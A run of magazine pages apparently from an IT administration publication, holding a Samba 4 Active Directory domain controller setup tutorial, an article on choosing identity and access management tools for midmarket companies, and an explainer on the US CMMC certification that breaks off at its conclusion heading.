Since Windows Server 2003, a Samba server can become a member of an existing AD forest. However, this setup always required a Windows server as the domain controller. In version 4, Samba itself could assume the domain controller role. The implementation also supports mixed operation of Windows and Linux servers as DCs. Of course, users with an existing Windows server infrastructure will not want to swap their systems for Samba servers. Rather, the solution is recommended for environments that use Windows, macOS, and Linux on the client side but run their server services on Linux systems. In this scenario, a Samba server serves as a central directory service for Windows, macOS, and Linux systems, as well as a file server for all.

Installing Samba 4

A directory server hosts a whole range of services and protocols such as domain name system (DNS), Kerberos, and LDAP. Samba integrates all services to ensure they work together optimally in the Active Directory Service (ADS) DC. Other products such as FreeIPA, for example, are made up of various components such as MIT Kerberos, OpenLDAP, and Bind9. However,


complete integration of the libraries into the Samba ADS package causes problems for various distributions. The Fedora and Enterprise Linux (EL) distributions rely on MIT Kerberos and ship with its packages in place. ("EL" includes all Linux distributions that are clones of Red Hat Enterprise Linux, such as Alma or Rocky Linux and CentOS Stream.) Unfortunately, this approach still does not work correctly in ADS mode. A TechPreview build of the Samba server that includes MIT Kerberos is not currently considered stable. Samba prefers the "Heimdal" implementation of Kerberos for the AD service. A Samba ADS can only be set up on Fedora and EL distributions if you use workarounds that require either third-party repositories or a Samba build from source code.
For this reason, I used two Debian variants in the test setup: the current Debian 11 on a virtual machine and an ARM CubieTruck single-board computer with Armbian 5.9, which is based on Debian 10. In smaller environments, a single-board computer of this class (ARM V7 dual core, 2GB of RAM) is fine as an ADS. In preparation, the machines need a standard Debian (Armbian) minimal setup with a static IP address and the correct configuration of /etc/hostname and /etc/hosts.
The first computer with ADS also assumes the role of the DNS server. If you already have a Dynamic Host Configuration Protocol (DHCP) service running on the local area network (LAN), it must point to the IP address of the ADS as the DNS (DHCP option 6) and transmit the domain name (DHCP option 15). During the install, the primary ADS node must be able to access your existing DNS server, but you can change the DNS setup after the initial setup (Figure 1).

Figure 1: Use the standard AD tools on Windows to customize the domain settings of the Linux DC.

As with all other services that use encryption, the correct system time is essential. On an ADS network, the domain controller also acts as a time source for its clients. Before the install, first make sure that the server's system time and time zone match and that a service such as Network Time Protocol (NTP) or Chrony ensures automatic time synchronization with the Internet. This detail is especially important in a setup with an ARM single-board computer because systems like a Raspberry Pi or CubieTruck do not have a hardware clock.
If you want your Samba server to manage advanced access authorizations (access control lists, ACLs), the server's filesystem must allow extended attributes, which are always enabled on modern Linux installations with XFS or Btrfs. This setup is now also the standard for ext4 filesystems. If you are using ext4, you can check /boot/config-<current kernel> to make sure the required settings are in place before you install:

CONFIG_EXT4_FS_POSIX_ACL=y
CONFIG_EXT4_FS_SECURITY=y

Now set up the required packages on your Debian server:

apt install samba samba-vfs-modules \
    samba-dsdb-modules smbclient winbind \
    libpam-winbind libnss-winbind \
    krb5-kdc libpam-krb5 -y

The basic Samba installation comes with a configuration file as a template. However, the ADS setup creates a new one, so you need to remove the old one by typing

rm /etc/samba/smb.conf

before you proceed with the setup. The Samba tool then guides you through the AD setup with:

samba-tool domain provision --interactive

Without any further parameters, the Samba tool relies on Samba's internal services for all required services (DNS, Kerberos). When prompted, enter the domain and realm name information. Another important item to enter is your existing DNS server as the forwarder (Figure 2). Finally, the setup creates the appropriate configuration files and a registry. The setup immediately creates the smb.conf file in the correct directory. The Kerberos configuration, on the other hand, needs to be copied manually to the correct directory by typing

cp /var/lib/samba/private/krb5.conf /etc/
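Checking the two ext4 kernel options mentioned above can also be scripted. A small sketch (the function name is ours; /boot/config-$(uname -r) is the usual Debian location of the kernel config):

```shell
# Return success only if both required ext4 options are enabled.
ext4_xattr_ok() {
  grep -q '^CONFIG_EXT4_FS_POSIX_ACL=y' "$1" &&
  grep -q '^CONFIG_EXT4_FS_SECURITY=y' "$1"
}

if ext4_xattr_ok "/boot/config-$(uname -r)" 2>/dev/null; then
  echo "extended attributes enabled"
else
  echo "check your kernel configuration"
fi
```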


Samba provides a separate binary for AD operation. To prevent the regular Samba services from running or being started accidentally, enter:

systemctl stop smbd nmbd winbind
systemctl disable smbd nmbd winbind
systemctl mask smbd nmbd winbind

and, instead, use the AD server service:

systemctl unmask samba-ad-dc
systemctl start samba-ad-dc
systemctl enable samba-ad-dc

which integrates all services.

Checking the DNS Service

Once the Samba AD server is running, it assumes the DNS role for the network. On the DC system itself, you now need to configure local DNS resolution. The Samba tool has added your existing DNS server to the configuration in /etc/samba/smb.conf:

[global]
dns forwarder = <DNS IP address>
...

The local DNS resolver therefore also needs to point to the local system. Modern distributions use the systemd-resolved service, which detects network changes and dynamically adjusts the DNS configuration by overwriting the /etc/resolv.conf file as needed. This service is needed by users on clients that frequently switch LANs or establish VPN connections. The domain controller in this example, on the other hand, requires a static DNS configuration, which you can achieve by turning off the systemd-resolved service and unlinking the resolv.conf file:

systemctl stop systemd-resolved
systemctl disable systemd-resolved
cd /etc
unlink resolv.conf

In an editor of your choice, create a new /etc/resolv.conf with only two entries:

nameserver <IP address of the DC>
search <domain name>

Next, check that both a local and a forwarded DNS request work. The command

host -t SRV _ldap._tcp.<Domain Name>

must respond with has SRV record 0 0 389 <FQDN of the DC>, whereas a regular DNS request to the Internet is answered by the forwarder with, for example, www.admin-magazine.com has address <IP-Address>. Errors in the DNS are some of the most common causes of directory setup problems. Whatever else happens, this service must work correctly in your environment.

Figure 2: The Windows DNS Manager manages the DNS zones of the forest. The Linux DC servers synchronize their settings.

ADS Management at the Command Line

The Samba tool used previously can do more than just guide you interactively through the AD setup. It also acts as a command-line interface (CLI) for AD management that manages users and group memberships easily. Before you can work with the Samba tool, you first need to log in as an administrator; then you can manage the directory:

kinit Administrator
samba-tool user create hammer IamAgenius
samba-tool group addmembers ncc1701 hammer

The practical thing about the CLI method is that standard tasks can be handled by script. A simple Bash script could read the DNS configuration of an existing /etc/hosts file and transfer these hosts to the AD-integrated DNS with samba-tool dns add.

Adding Clients

Before you add a client to AD, you need to verify that its DNS configuration points to the DC server. This example deploys Windows 10 Enterprise and Windows Server 2022. Windows 10 Enterprise version 21H2 does not have the Join a domain button that previous Windows versions had in system Settings. You need to work your way through the following menus in Windows: Start | Settings | System | About | Rename this PC (advanced). In the System Properties dialog, press Change and enter the name of your domain in

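As an aside, the Bash idea for feeding /etc/hosts into the AD-integrated DNS might look like the following sketch. The DC name (dc1) and zone (samdom.example.com) are placeholders for your environment; the function only prints the samba-tool calls, so you can review them before piping the output to sh:

```shell
# Emit one "samba-tool dns add" call per usable /etc/hosts entry.
hosts_to_dns_cmds() {
  while read -r ip name _; do
    case "$ip" in ''|\#*|127.*|::1) continue ;; esac  # skip blanks, comments, loopback
    [ -n "$name" ] || continue                        # skip entries without a host name
    printf 'samba-tool dns add dc1 samdom.example.com %s A %s -U Administrator\n' \
      "$name" "$ip"
  done < "$1"
}

hosts_to_dns_cmds /etc/hosts          # inspect the generated commands
# hosts_to_dns_cmds /etc/hosts | sh   # then apply them
```

IPv6 entries other than ::1 would need AAAA records; the sketch ignores that case.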

the Member of Domain box. Now Windows asks for a user with the domain join permission. Simply enter Administrator with the appropriate password and the system will become part of the domain. After restarting, you can log in to the Windows client as one of the previously created users.
If you want to use the GUI tools for AD administration on this Windows client, you can download them from Microsoft [1]. Windows Server 2022 provides the appropriate tools. The DS-Client setup works in a similarly simple way on Linux systems. Different Kerberos versions for the clients have no compatibility issues as long as they use AD for login verification and do not run a local Samba service. EL and Fedora systems can join the domain just like Debian systems. On a Fedora 36 workstation, the first step is to install the necessary packages:

dnf install realmd sssd oddjob \
    oddjob-mkhomedir adcli \
    samba-common-tools -y

If needed, adjust the DNS configuration in systemd-resolved as described previously. Make sure the configuration is correct and the Fedora client can contact the DC:

realm discover <Domain-Name>

If you do not get an error message here, add the Linux client to the domain:

realm join <Domain-Name> -v

The -v switch prints all the details of the operation on the CLI. At the end of the process, Successfully enrolled machine in realm confirms joining the domain. Now you can log in to the Linux GUI or CLI with a domain user.

Adding a Second DC

Of course, one DC should not manage a network alone, so you need to add at least one more DC. It is also considered best practice for DCs not to provide file shares but devote themselves to their tasks as domain controllers. Regular domain member servers without DC functions then host the filesystem shares – but more on this later. Setting up additional AD servers follows the same pattern as for the first AD server: Set up the packages, delete smb.conf, check the DNS configuration, and adjust if necessary. On another DC server, run the Samba tool:

samba-tool domain join <domain-name> DC \
    -U"Administrator@<domain-name>"

The tool will then prompt you for the admin password and perform the AD setup. Afterward, disable and

comment out the regular Samba services as on the first DC, enable the samba-ad-dc service instead, and apply the Kerberos configuration.

Becoming a Domain Member

If you specify

samba-tool domain join \
    <Domain Name> MEMBER

instead of DC, the system only joins the domain as a member and not as a domain controller. However, this does not always work flawlessly or with all distributions. The somewhat more complex way, which also works with other distributions such as Fedora or EL, uses a manual configuration.
The setup of a member server differs from the client setup described above. For a client, you just need the System Security Services Daemon (SSSD) with Kerberos. The member, on the other side, connects to the domain with Samba's Winbind service without needing SSSD. On the EL8 system (e.g., RHEL 8, Alma or Rocky Linux, CentOS Stream 8), which I use as a domain member, the necessary services need to be set up first:

dnf install samba samba-client \
    samba-winbind samba-winbind-clients \
    oddjob oddjob-mkhomedir

Adjust the smb.conf configuration for the member server (Listing 1). Doing so specifies that Winbind uses ADS to query the users.

Listing 1: smb.conf for Member Server
[global]
realm = <ADS Realm>
security = ADS
template shell = /bin/bash
winbind enum groups = Yes
winbind enum users = Yes
winbind offline logon = Yes
winbind use default domain = Yes
workgroup = <AD Workgroup Name>
idmap config * : rangesize = 1000000
idmap config * : range = 100000-19999999
idmap config * : backend = autorid
...

To ensure that the local system also uses Winbind to determine users and their IDs, you also need to modify the /etc/nsswitch.conf file. The entries for passwd and group should look something like:

passwd:    compat winbind
group:     compat winbind

The Linux system will then first search the local passwd and group files for users and groups, along with their IDs. If it doesn't find anything there, it fetches the information from the domain via Winbind. In an AD client setup, for example, sssd is displayed here instead of winbind. Now you can register the member server as a member of the domain with

net ads join -U Administrator

and start the winbind and smb services. You might get an error message stating that DNS registration did not work, but this response is not a big deal. Just enter the server manually in the ADS-integrated DNS. After that, you can share folders on the member server and make them available as shares in the ADS forest.

Text or Registry

A Samba server usually stores its configuration in the /etc/samba/smb.conf text file, making it difficult for a Windows administrator to configure Samba services. Alternatively, the service can save all or part of its configuration in a registry. This function is often used in Samba clusters. For example, in the domain setup described here, this means that an administrator can customize the Samba configuration of a Linux server with the registry editor while working on a Windows workstation.
To put the complete configuration of a Samba server into the registry, you need an /etc/samba/smb.conf with exactly two lines:

[global]
config backend = registry

In this case, Samba ignores the complete content of the smb.conf file and reads the information from the registry only. In many cases, this method is too strict, which is why you have two other options:

include = registry
registry shares = yes

The first option evaluates the complete smb.conf file plus the registry entries, and the second option only reads information about shares from the registry. Therefore, you can only change the shares, but not the basic server configuration, in the registry.
Samba does not evaluate all the share information at startup time. Only when a client wants to access a share does Samba look for the associated information in the registry. Samba saves all its keys in HKLM/Software/Samba/smbconf. Given sufficient rights, you can edit the registry with regedit over the LAN or with the Linux samba-regedit CLI tool in a legacy GTK design. If you want to work with the registry, you can transfer an existing smb.conf to the registry with net conf import.

Conclusions

On small and medium-sized networks with heterogeneous systems, a Samba domain controller performs well and ensures a smooth exchange of files between the various client systems. In this article, I looked at as many solutions as possible for different distributions. Of course, the whole thing works on a Mac, on Windows, and on Linux, even though I did not go into the details of setting up an AD connection for a macOS client here.

Info
[1] Microsoft GUI Tools (RSAT): [https://www.microsoft.com/en-us/download/details.aspx?id=45520]
NUTS AND BOLTS | Midmarket IAM

IAM for midmarket companies

Spoiled for Choice


We look at the role of identity and access management in midmarket organizations. By Martin Kuppinger

Photo by Robert Anasch on Unsplash

Up to now, identity and access management (IAM) has mainly been the domain of larger organizations, but it is important for organizations of all sizes to manage digital identities (not only of their employees) and their access authorizations in an efficient and effective way. However, a chronic shortage of personnel in the midmarket makes it crucial for these organizations to define their own IAM requirements precisely and select the right providers.

IAM has the reputation of being complex; this opinion is sometimes justified, but by no means always true. This rumored, presumed, or perceived complexity, together with what are typically small IT teams in the midmarket, often makes organizations reluctant to venture into the discussion. However, IAM is important for many reasons: security; regulatory compliance; more efficient processes for employees, business partners, and customers; simple yet secure access to systems and applications; and, last but not least, administrative efficiency.

The popular definition of the midmarket includes medium-sized companies with 51 to 1,000 employees and larger medium-sized companies with 1,001 to 10,000 employees. In the larger midmarket, genuine IAM infrastructures are very often already in place for managing users and access authorizations (IGA, identity governance and administration), for access control (access management with authentication and identity federation), and, in some cases, for monitoring and controlling access by highly privileged users (PAM, privileged access management).

Smaller companies, on the other hand, often have only technical administration tools, for example, the Quest Active Roles server for Microsoft Active Directory (AD). IT managers then tend to manage permissions in applications interlocked with Active Directory in AD groups while managing other applications manually. Sometimes specialized solutions for business applications show up, like SAP (e.g., SAP Access Control).

New Requirements Make IAM Essential

However, these products are not up to the task in most cases, not least because requirements are growing and IT environments are changing. To begin with, every organization is a potential target for cyberattacks. Attackers are always looking to gain control of user accounts to steal data, distribute malware, or carry out attacks. However, that is only one aspect, because IT landscapes are changing in small and mid-sized enterprises (SMEs) because of the increasing use of cloud services with a tendency to use more services overall – often for specialized tasks. For each of these services, managing users and permissions securely is important.

Additionally, the role of Active Directory, used in most midmarket


companies, is changing. After the introduction of Microsoft 365, companies started using Azure Active Directory (AAD) and Microsoft Entra [1], which meant that, for what is often a long transition period, two central services are combined and managed, increasing the complexity that IAM can help reduce.

One issue that no midmarket company in any sector can afford to underestimate, especially in the manufacturing industry, is the demand from important customers for certification in line with the ISO 2700x standards. These standards also include working IAM. Even if the requirement can be covered in a basic way with manual processes, certification can be achieved more easily if organizations use suitable IAM applications.

This situation is even more true for companies in the critical infrastructure sector, where the requirements for IT security management, and therefore also for user and authorization management, have been significantly tightened. Following the German KRITIS (critical infrastructure) revisions, the focus has also increasingly shifted to medium-sized companies, where working IAM has become practically mandatory.

The topic of Industry 4.0 (convergence of information and operational technology systems for seamless generation, analysis, and communication of data) is also directly related to IAM – on the one hand for access control in the manufacturing sector and on the other hand to secure business systems that interface with production systems and to reduce the risk of attacks on them.

Most importantly, it's not just about employees, but also access by (and applications for) business partners and, especially, customers and consumers. Virtually all organizations are facing growing demand to provide more digital services, which are increasingly at the core of business models. The digital identities of customers and consumers need to be managed, as does employee access to these services.

The Right Amount of IAM for the Midmarket

How much IAM is feasible for the midmarket, and which aspects of IAM are genuinely needed? IAM is very diverse, as a look at reference architectures shows (Figure 1), but what parts of it do SMEs really need?

IGA includes tools for user lifecycle management for technical identity provisioning, with the creation, modification, and deletion of user accounts in target systems, complemented by support for access governance (e.g., the recertification of authorizations). These are core areas of IAM. Within IGA, however, it is primarily about having standardized processes for the essential tasks (e.g., creating and changing departments and deleting users), supporting a simple authorization request, and checking and being able to connect to critical target systems. For midsize companies in particular, connecting can turn into a challenge because many vendors support common business applications for large enterprises but not midsize solutions. Providers specializing in SMEs (e.g., Tenfold) can be an alternative.

Access management for centralized control of authentication; support for multifactor authentication and, if possible, login without passwords; and interaction with target applications are also a must. This integration requires not only support for common identity federation standards such as OAuth, OpenID Connect [2], and Security Assertion Markup Language (SAML), but also web access management for legacy applications.
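To make "support for common identity federation standards" slightly more concrete, the sketch below builds the first request of an OpenID Connect authorization-code flow – the URL a web application redirects users to for login. The issuer, client ID, and redirect URI are hypothetical placeholders, and the /authorize path stands in for the authorization endpoint a real provider publishes through OIDC discovery; production code would normally use a maintained OIDC client library instead.

```python
from urllib.parse import urlencode

def build_oidc_auth_url(issuer, client_id, redirect_uri, state):
    """Build the authorization request URL for the OIDC authorization-code flow."""
    params = {
        "response_type": "code",          # authorization-code flow
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": "openid profile email",  # "openid" marks this as an OIDC request
        "state": state,                   # opaque value echoed back to deter CSRF
    }
    return f"{issuer}/authorize?{urlencode(params)}"

url = build_oidc_auth_url(
    "https://login.example.com",          # hypothetical identity provider
    "inventory-app",
    "https://apps.example.com/callback",
    "f00dcafe",
)
print(url)
```

After the user authenticates, the provider redirects back to the given URI with a one-time code that the application exchanges for ID and access tokens.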

Figure 1: The IAM reference architecture shows the variety of related topics. SMEs need to think carefully about what they want to
implement and what they can implement.


In addition to these building blocks, admins also need to think about a suitable customer IAM (CIAM) application, especially where companies are developing many of their own digital services. Which products are best suited here depends heavily on the application scenarios. Where many custom applications are created, developer-focused tools that provide APIs for identity functions such as user registration and authentication make the most sense (e.g., Okta [3] and Auth0 [4]).

The use of PAM in SMEs is also important, although nowhere near as widespread. However, some of today's IAM offerings include integrated PAM features, at least for basic functions. Some PAM providers are in the market, such as Delinea, but also smaller specialists who have comparatively lean and easy-to-implement products in their portfolios. Some of the vendors in the market, such as Microsoft or EmpowerID [5], offer several of these functional areas from a single source in an integrated platform.

Planning IAM Carefully

Each of the topics mentioned above is a project in its own right, which makes it important to plan the introduction or modernization of IAM carefully and not take on too much. Of course, the only way to ensure that a sensible overall solution is created is to make a roadmap – a precise definition of where the company wants to go and which projects are part of the IAM program.

The first step for IT managers is to consider whether individual solutions or a suite of products is more suitable to cover as many areas as possible from a single source. Microsoft and Okta, but also EmpowerID or N8 Identity, are some of the vendors that cover multiple functional areas in a comparatively lean application.

On the other hand, specialists in each of the sub-segments are highly suitable for SMEs. When it comes to access management in particular, many cloud services beyond Microsoft and Okta can be easily implemented. In addition to One Identity, OneLogin, and Ping Identity, there are European providers such as Nevis, Ergon, United Security Providers, and Ilex. A number of IGA manufacturers with many references in SMEs include European providers such as Omada or Beta Systems, on top of SME specialists such as Tenfold or OGiTiX.

In terms of sequence, the typical starting points are either access management, to enable secure user access with multifactor authentication and identity federation, or IGA, for basic lifecycle and authorization management functions. Both are fine as long as the IT manager has a clear plan for the step-by-step implementation of the other functions, too.

Choosing the Right Provider

As is already clear from the list of vendors in the examples above, many companies supply platforms suitable for SMEs. Depending on your specific requirements, though, you might need to turn to large-scale, leading IAM providers. Where companies develop digital services of high complexity, ForgeRock [6] is an interesting option, especially in terms of CIAM requirements. For complex regulatory requirements, market-leading IGA vendors such as SailPoint [7], One Identity [8], or IBM are relevant options, even for the smaller midmarket.

In addition to the target image, there is the matter of defining your own requirements, both in terms of the required functionality and the target systems to be connected. This dataset can then be used to compare providers. Taking a closer look at the products and having them demonstrated is also important to understand whether they meet the requirements and what the internal IT team can do to help.

In essence, the providers can be divided into five categories (Figure 2):
• Cloud-integrated solutions from the major cloud providers: Both

Figure 2: The focal areas of use of different types of IAM tools, looking at criticality and complexity of requirements.


Microsoft and Google offer IAM functionality in tight integration with their respective Office platforms. These platforms can also provide the foundation for organization-wide IAM, especially in the case of Microsoft with its coverage of all major IAM functional areas.
• Plain vanilla identity as a service (IDaaS; i.e., IAM products from the cloud): These solutions are now offered by almost all IAM vendors and have the advantage that the overhead required for setup, customization, and operation is significantly lower than for traditional local tools. This solution also makes applications that were previously considered too complex for the midmarket as on-premises variants an option in this market segment.
• IAM systems in the various sub-segments that can be used locally and that bundle multiple functions or are generally comparatively simple and lean in use.
• Complementary solutions for managing Azure AD and Entra and on-premises AD, where the vast majority of target applications interact with these systems anyway.
• Specialized IAM with a midmarket focus, often characterized by the fact that it also has many interfaces to typical business applications in the midmarket.

The IAM market is very large, so I can only list the vendors by way of example at this point. In any case, I recommend doing detailed research, whether on the Internet or by calling in an analyst, to identify suitable providers.

Different applications are required as a function of the complexity and criticality (i.e., the regulatory requirements in particular). Where regulatory pressure is high and environments are complex (e.g., in KRITIS-relevant companies), classic IAM or IDaaS from established providers is more in demand; otherwise, cloud-integrated or specialist products for SMEs, for example, might be the better choice.

The two most important criteria for selection are defining your own requirements and taking the time to ensure a good overview of the market. You can then select the products, check them against your requirements, view demos, and, if necessary, perform a proof of concept.

Conclusions

Because IAM projects are costly, IT managers need to invest both time and money to identify the right product. One thing is certain: Mistakes in product selection are far more time-consuming and expensive than well-planned and well-executed product selection. When defining requirements, it is important to have realistic goals. What is really needed and what is manageable? Simple authorization models and simple recertification instead of sophisticated functions are usually the better choice. It is also important for manufacturers to include standard features, such as predefined processes and reports. References in the SME sector are also an important criterion.

Additionally, those responsible for IT should be supported, both in the selection of products and in project implementation, by suitable partners who – depending on the phase – offer market knowledge or implementation expertise, especially in SMEs. If you get it right and the setup is carefully considered, IAM is feasible and controllable even for medium-sized businesses, where IAM is more important than ever.

Info
[1] Microsoft Entra: [https://www.microsoft.com/en-us/security/blog/2022/05/31/secure-access-for-a-connected-worldmeet-microsoft-entra/]
[2] OpenID Connect: [https://openid.net/connect/]
[3] Okta: [https://www.okta.com]
[4] Auth0: [https://auth0.com]
[5] EmpowerID: [https://www.empowerid.com]
[6] ForgeRock: [https://www.forgerock.com]
[7] SailPoint: [https://www.sailpoint.com]
[8] One Identity: [https://www.oneidentity.com]

Author
Martin Kuppinger is the founder of and Principal Analyst at KuppingerCole Analysts AG.

NUTS AND BOLTS CMMC: US Cybersecurity Model

Understanding Cybersecurity Maturity Model Certification

Ready, Steady, …
United States Cybersecurity Maturity Model Certification will be required by mid-2023 to handle controlled
unclassified information and win federal contracts, but it can also help minimize business risk and keep
information out of the hands of adversaries. By Christopher J. Cowen

Photo by Braden Collum on Unsplash

The US Department of Defense (DoD or the Department) created the Cybersecurity Maturity Model Certification (CMMC) program to add a comprehensive and scalable certification process to verify the implementation of industry practices that achieve a cybersecurity maturity level. CMMC is designed to provide assurance to departments and agencies that the defense industrial base (DIB) contractor can adequately protect sensitive unclassified information such as federal contract information and controlled unclassified information (CUI). The US government is concerned with ensuring that the data and information their contractors receive is stored and used safely. This government-furnished information is more commonly known as GFI.

Of great concern is the potential that government-furnished information will escape into the wild. The US government wants to protect itself and its citizens against the theft of intellectual property and the sensitive information of US industrial sectors from malicious cyber activity. The aggregate loss of intellectual property and certain unclassified information from the DoD supply chain can threaten US economic and national security by undercutting technical advantages and innovation and significantly increasing risk to national security.

To address these concerns, the DoD issued an interim rule [1] in September 2020 intended to create a DoD assessment methodology and CMMC framework to assess a contractor's cybersecurity posture. By issuing the interim rule, the US government is seeking to understand what requirements and business practices contractors incorporate to protect their unclassified information systems and the data that is housed on those systems from a threat actor.

The US currently requires DoD contractors to include Defense Federal Acquisition Regulation Supplement (DFARS) clause 252.204-7012 [2] in subcontracts for which subcontract performance will involve covered defense information (DoD CUI). DFARS provides acquisition regulations that are specific to the DoD and outlines regulations to which DoD government acquisition officials, contractors, and subcontractors must adhere when doing business with the DoD. However, this DFARS clause does not provide the department or agency contracting this work sufficient insights with respect to the cybersecurity posture of DIB companies throughout the multitier supply chain for any given program or technology development effort.

Given the size and scale of the DIB sector, the DoD cannot scale its organic cybersecurity assessment capability to conduct on-site assessments of approximately 220,000 DoD contractors every three years. As a result, the Department's organic


assessment capability is best suited for conducting targeted assessments for a subset of DoD contractors that support prioritized programs, technology development efforts, or both. CMMC addresses the challenges of contractor assessment capabilities by partnering with an independent organization that will accredit and oversee third-party assessment and conduct on-site assessments of DoD contractors throughout their multitier supply chain contract. The cost of these CMMC assessments will be driven by multiple factors, including market forces, the size and complexity of the network or enclaves under assessment, and the CMMC level. Later I will talk about the plans to enforce CMMC.

What Material Falls Within CMMC?

In a simplified definition, only unclassified data and information that falls below the classified category falls within the purview of CMMC. Classified data and information have distinct processes and guidelines that contractors must adhere to in order to possess these types of materials. Classified data not covered by CMMC is secret (S), top secret (TS), or top secret sensitive compartmented information (TS-SCI).

Within the unclassified data and information category of material are distinct classifications of data that require CMMC protection:
• CUI Assets process, store, or transmit CUI.
• Security Protection Assets provide functions or capabilities to include people, technology, and facilities.
• Contractor Risk Managed Assets are capable of, but not intended to, process, store, or transmit CUI because of the security policy, procedures, and practices in place.
• Specialized Assets are government property, industrial Internet of Things, supervisory control and data acquisition (SCADA) systems, and restricted information systems or test equipment that may handle CUI.

CMMC Framework

The framework has three key features:

Tiered Model. CMMC requires that companies entrusted with national security information implement cybersecurity standards at progressively advanced levels, depending on the type and sensitivity of the information. The program also sets forth the process for information flow down to subcontractors.

Assessment Requirement. CMMC assessments allow the Department to verify the implementation of clear cybersecurity standards.

Implementation Through Contracts. Once CMMC is fully implemented, certain DoD contractors that handle sensitive unclassified DoD information will be required to achieve a particular CMMC level as a condition of contract award.

Building on the National Institute of Standards and Technology special publication (NIST SP) 800-171 (DoD Assessment Methodology) [3], the CMMC framework adds a comprehensive and scalable certification element to verify the implementation of processes and practices associated with the achievement of a cybersecurity maturity level. CMMC is designed to provide increased assurance to the Department that a DIB contractor can adequately protect sensitive unclassified information (i.e., CUI) at a level commensurate with the risk, accounting for information flow down to its subcontractors in a multitier supply chain.

Implementation of the CMMC framework is intended to solve the following problems:
• Verification of a contractor's cybersecurity posture. DIB companies self-attest that they will implement the requirements in NIST SP 800-171 on submission of their contract offer.
• DoD contractors that inconsistently implement mandated system security requirements for safeguarding CUI.
• Verification of a DIB contractor's cybersecurity posture. The company must achieve the CMMC level certification required as a condition of contract award.

CMMC in Depth

CMMC is currently on its second iteration, CMMC 2.0. The prior iteration of CMMC was CMMC 1.0, which built a framework of four elements: security domains, capabilities, practices, and processes. When combined, they built best practices for the protection of an organization and associated federal contract information and CUI. CMMC 1.0 had five cybersecurity maturity levels (1-5) that composed the CMMC framework, with level 1 being the least mature and level 5 the most mature.

The CMMC 1.0 framework consisted of 17 cybersecurity domains. A domain is a distinct group of security practices that have similar attributes and are key to the protection of federal contract information and CUI, either individually or in combination. Each domain comprises several capabilities an organization is expected to achieve to ensure that cybersecurity and the protection of federal contract information and CUI is sustainable. Capabilities are a combination of practices, processes, skills, knowledge, tools, and behaviors, which when working together enable an organization to protect federal contract information and CUI. In total (at level 5) the CMMC framework identifies 171 practices associated with the 17 security domains and mapped across the five maturity levels.

Practices applied at maturity levels 1 and 2 have been referenced from Federal Acquisition Regulation (FAR) 52.204-21 [4] for the basic safeguarding of covered contractor information systems applied to the protection of federal contract information. Practices applied at levels 3, 4, and 5 are referenced from DFARS 252.204-7012 [2] for the safeguarding of covered defense information and cyber-incident reporting. Most of the above framework and guidelines carried over to CMMC 2.0 with the one big exception that CMMC 2.0 only has


three levels, as opposed to the five levels of CMMC 1.0.

CMMC 2.0

In March 2021, the DoD initiated an internal review of CMMC's implementation, informed by more than 850 public comments in response to the interim DFARS rule. This comprehensive, programmatic assessment engaged cybersecurity and acquisition leaders within DoD to refine policy and program implementation, and in November 2021, the DoD announced CMMC 2.0 [5]. The view is that version 2.0 would achieve the primary goals that came out of this internal review:
• Safeguard sensitive information to enable and protect the warfighter.
• Dynamically enhance DIB cybersecurity to meet evolving threats.
• Ensure accountability while minimizing barriers to compliance with DoD requirements.
• Contribute toward instilling a collaborative culture of cybersecurity and cyber resilience.
• Maintain public trust through high professional and ethical standards.

The enhanced CMMC 2.0 program maintains the program's original goal of safeguarding sensitive information while trying to simplify the CMMC standard and providing additional clarity on cybersecurity regulatory, policy, and contracting requirements. The US government believes this is achieved by focusing the most advanced cybersecurity standards and third-party assessment requirements on companies supporting the highest priority programs and increasing Department oversight of professional and ethical standards in the assessment ecosystem.

The program is meant to ensure accountability for companies to implement cybersecurity standards while minimizing barriers to compliance with DoD requirements, as well as to instill a collaborative culture of cybersecurity and cyber resilience and enhance public trust in the CMMC ecosystem, while increasing overall ease of execution. Jesse Salazar, Deputy Assistant Secretary of Defense for Industrial Policy, one of the leaders of the CMMC effort, said [6]: "CMMC 2.0 will dramatically strengthen the cybersecurity of the defense industrial base. By establishing a more collaborative relationship with industry, these updates will support businesses in adopting the practices they need to thwart cyber threats while minimizing barriers to compliance with DoD requirements."

Figure 1 shows the difference between CMMC versions 1.0 and 2.0. With the implementation of CMMC 2.0, the Department is introducing several key changes that build on CMMC 1.0 and refine the original program requirements:
• A streamlined model that focuses on the most critical requirements and reduces the model from five to three compliance levels. This change aligns CMMC 2.0 with widely accepted standards and uses NIST cybersecurity standards.
• Reliable assessments reduce assessment costs and allow all companies at level 1 (Foundational) and a subset of companies at level 2 (Advanced) to demonstrate compliance through self-assessments. Higher accountability increases oversight of professional and ethical standards of third-party assessors.
• Flexible implementation encourages a spirit of collaboration that allows companies, under certain limited circumstances, to make plans of action and milestones

Figure 1: Key features of CMMC 2.0 compared with version 1.0.


(POA&Ms) to achieve certification. The added flexibility and speed allow waivers to CMMC requirements under certain limited circumstances.

CMMC Is Coming

Whether you like it or not, the DoD is planning to release an interim rule on the CMMC framework by May 2023, according to Stacy Bostjanick, director of the CMMC program for the DoD [7]. CMMC will be enacted on the day the interim rule is published, and CMMC requirements will start to appear in DoD contracts by July 2023, 60 days after publication of the interim rules.

Doing nothing is not an option. As of this writing, defense contractors have little more than a year to become CMMC compliant. If your company is still at the very beginning of this timeline, the time for action is now, although you might be able to take consolation on two fronts:

First, the time and effort needed to achieve compliance will be different for every defense contractor. Variables include your baseline cybersecurity maturity level and the resources and prioritization you can assign to achieving compliance. Your organization might need less time to achieve and demonstrate compliance, or you might be able to commit more resources and energy than a typical contractor would and so make up for lost time.

Second, under CMMC 2.0, it will be permissible to sign DoD contracts with a POA&M in place, which means your organization does not need to achieve the highest assessment score possible by May 2023. However, in case that lessens your sense of urgency, consider that CMMC 2.0 will bring critical changes to the reprieve that POA&Ms have historically offered. POA&Ms will most likely have time constraints. At this point, it seems that contractors will have 180 days to remediate security gaps identified in their POA&Ms, but that is subject to change during the CMMC 2.0 interim rule-making process.

Bostjanick also said recently [7] that the DoD is expected to permit POA&Ms only for the lowest-risk security controls (i.e., those that are worth just one point in the DoD's assessment scoring methodology). Fifty of the 110 security controls are worth one point. That leaves 60 controls that are worth either three or five points and must be met before a contractor's CMMC level 2 assessment. These 60 controls are both the most important for securing CUI and some of the most difficult to meet.

In short, although your organization doesn't have to achieve the highest possible assessment score by May 2023, it should be on the cusp of doing so by then. Your business risk is too high to be far behind the timeline of your organization's compliance journey.

Conclusion

